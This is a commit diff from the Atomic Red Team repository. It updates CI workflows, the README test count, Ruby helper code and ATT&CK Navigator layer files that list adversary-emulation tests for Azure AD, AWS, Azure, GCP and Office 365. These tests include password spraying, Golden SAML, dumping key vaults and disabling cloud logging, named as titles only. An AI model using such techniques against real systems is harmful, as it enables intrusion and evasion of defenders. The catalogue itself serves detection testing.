Delete static directory

Doesn't appear we use this directory or file - removing.
updating atomics count in README.md [ci skip]
2023-08-21 08:37:13 -07:00 · 2023-08-15 22:54:12 +00:00 · 2023-08-15 16:53:26 -06:00 · 2023-08-15 01:05:57 +00:00 · 2023-08-15 01:05:39 +00:00 · 2023-08-14 19:04:57 -06:00
129 changed files with 6175 additions and 611 deletions
@@ -0,0 +1,11 @@
+# To get started with Dependabot version updates, you'll need to specify which
+# package ecosystems to update and where the package manifests are located.
+# Please see the documentation for all configuration options:
+# https://docs.github.com/github/administering-a-repository/configuration-options-for-dependency-updates
+
+version: 2
+updates:
+  - package-ecosystem: "pip" # See documentation for possible values
+    directory: "/" # Location of package manifests
+    schedule:
+      interval: "weekly"
@@ -2,7 +2,7 @@ name: assign-labels

 on:
  workflow_run:
-    workflows: [ "validate-atomics" ]
+    workflows: ["validate-atomics"]
    types:
      - completed

@@ -56,4 +56,4 @@ jobs:
                repo: context.repo.repo,
                assignees: obj.maintainers
              });
-            }
+            }
@@ -2,26 +2,29 @@ name: generate-svg-counter

 on:
  push:
-    branches:
-      - master
+    branches: ["master"]

 jobs:
  generate-counter:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
+        with:
+          token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
+      - name: Install poetry
+        run: pipx install poetry
      - uses: actions/setup-python@v4
        with:
          python-version: '3.11.2' 
          cache: 'poetry'
+      - name: Install dependencies
+        run: poetry install --no-interaction --no-root
      - name: Generate shields.io URL
-        run: python generate_shield.py atomics/
-        id: shield
-      - name: Generate shields.io URL
-        run: python generate_counter.py -d atomics/
+        run: poetry run python bin/generate_counter.py -f atomics/
        id: counter
      - name: Update README
        run: |
+          echo ${{ steps.counter.outputs.result }}
          sed -i "s|https://img.shields.io/badge/Atomics-.*-flat.svg|${{ steps.counter.outputs.result }}|" README.md
        shell: bash
      - name: update github with new site
@@ -34,4 +37,4 @@ jobs:
          git commit --allow-empty -m "updating atomics count in README.md [ci skip]"
          # push quietly to prevent showing the token in log
          # no need to provide any credentials
-          git push
+          git push --force
@@ -1,18 +1,16 @@
 name: generate-docs
 on:
  push:
-    branches:
-      - master
+    branches: ["master"]
+
 jobs:
  generate-docs:
    runs-on: ubuntu-latest
    steps:
      - name: checkout repo
-        uses: actions/checkout@v2
-        with: 
+        uses: actions/checkout@v3
+        with:
          token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
-          ref: 'master'
-      
      - name: setup ruby
        uses: ruby/setup-ruby@v1
        with:
@@ -16,7 +16,9 @@

 # Atomic Red Team

-![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1274-flat.svg)
+![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/validate-atomics.yml/badge.svg?branch=master) ![Atomics](https://img.shields.io/badge/Atomics-1363-flat.svg) ![GitHub Action Status](https://github.com/redcanaryco/atomic-red-team/actions/workflows/generate-docs.yml/badge.svg?branch=master)
+
+

 Atomic Red Team™ is a library of tests mapped to the
 [MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
@@ -78,7 +78,7 @@ class AtomicRedTeam
    yaml_file = "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.yaml"
    markdown_file = "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.md"

-    if atomic_yaml_has_test_for_platform(yaml_file, only_platform) && (File.exists? markdown_file)
+    if atomic_yaml_has_test_for_platform(yaml_file, only_platform) && (File.exist? markdown_file)
      # we have a file for this technique, so link to it's Markdown file
      "[#{link_display}](../../#{technique_identifier}/#{technique_identifier}.md)"
    else
@@ -89,7 +89,7 @@ class AtomicRedTeam

  def atomic_yaml_has_test_for_platform(yaml_file, only_platform)
    has_test_for_platform = false
-    if File.exists? yaml_file
+    if File.exist? yaml_file
      yaml = YAML.load_file(yaml_file)
      yaml['atomic_tests'].each_with_index do |atomic, i|
        if atomic["supported_platforms"].any? {|platform| platform.downcase =~ only_platform}
@@ -107,7 +107,7 @@ class Attack
    @attack_stix ||= begin
      # load the full attack library
      local_attack_json_to_try = "#{File.dirname(__FILE__)}/enterprise-attack.json"
-      if File.exists? local_attack_json_to_try
+      if File.exist? local_attack_json_to_try
        JSON.parse File.read(local_attack_json_to_try)
      else
        JSON.parse open('https://raw.githubusercontent.com/mitre/cti/master/enterprise-attack/enterprise-attack.json').read
@@ -1 +1 @@
-{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1531","score":2,"enabled":true,"comment":"\n- Azure AD - Delete user via Azure AD PowerShell\n- Azure AD - Delete user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
+{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.003","score":1,"enabled":true,"comment":"\n- Azure AD - Add Company Administrator Role to a user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1531","score":2,"enabled":true,"comment":"\n- Azure AD - Delete user via Azure AD PowerShell\n- Azure AD - Delete user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":3,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
+{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1562","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- AWS - GuardDuty Suspension or Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":5,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":2,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
+{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":2,"enabled":true,"comment":"\n- Azure - Enumerate Azure Blobs with MicroBurst\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
@@ -1 +1 @@
-{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}
+{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":2,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n- GCP - Create Custom IAM Role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"comment":"\n- GCP - Delete Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- GCP - Delete Bucket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- GCP - Delete Activity Event Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
@@ -1 +1 @@
-{"name":"Atomic Red Team (Office-365)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"comment":"\n- Office365 - Email Forwarding\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- office-365-Disable-AntiPhishRule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":2,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log Disabled\n- Office 365 - Set Audit Bypass For a Mailbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]}]}
+{"name":"Atomic Red Team (Office-365)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"comment":"\n- EXO - Full access mailbox permission granted to a user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"comment":"\n- Office365 - Email Forwarding\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- office-365-Disable-AntiPhishRule\n","links":[{"label":"View 